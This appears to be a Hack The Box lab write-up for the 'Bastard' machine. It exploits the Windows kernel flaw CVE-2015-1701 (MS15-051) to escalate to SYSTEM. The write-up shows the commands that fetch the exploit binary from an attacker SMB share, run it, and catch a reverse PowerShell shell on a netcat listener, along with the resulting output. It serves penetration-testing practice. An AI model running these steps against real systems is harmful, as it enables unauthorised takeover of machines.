CVE-2015-1701 (MS15-051)
CVE-2015-1701 is a privilege escalation vulnerability that exists in the Windows kernel-mode driver, specifically in the way it handles objects in memory. The vulnerability allows a local attacker to elevate their privileges on a vulnerable system to those of the kernel, which is the highest level of privilege on a Windows system. This can allow an attacker to take complete control of the system, and potentially access sensitive information or execute malicious code.
This vulnerability affects all versions of the Microsoft Windows operating system from Windows 7 and Windows Server 2008 R2 to Windows 8.1 and Windows Server 2012 R2. It does not require any user interaction and can be exploited by an attacker who has already gained access to a low-privileged account on the affected system.
Sherlock discovered this vulnerability
Exploit
The exploit was found here
There were some trials and errors before landing a working exploit.
Privilege Escalation
PS C:\tmp> copy \\10.10.14.6\smb\ms15-051x64.exe
PS C:\tmp> .\ms15-051x64.exe
[#] ms15-051 fixed by zcgonvh
[#] usage: ms15-051 command
[#] eg: ms15-051 "whoami /all"
I transported the binary and it shows the usage upon execution.
PS C:\tmp> .\ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2416 created.
==============================
nt authority\system
It just works.
PS C:\tmp> .\ms15-051x64.exe C:\tmp\pe.exe
I will be using the payload
┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49310
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\tmp> whoami
nt authority\system
PS C:\tmp> hostname
Bastard
PS C:\tmp> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.10.9
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{56fec108-3f71-4327-bf45-2b4ee355cd0f}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
Tunnel adapter Local Area Connection* 9:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
System Level Compromise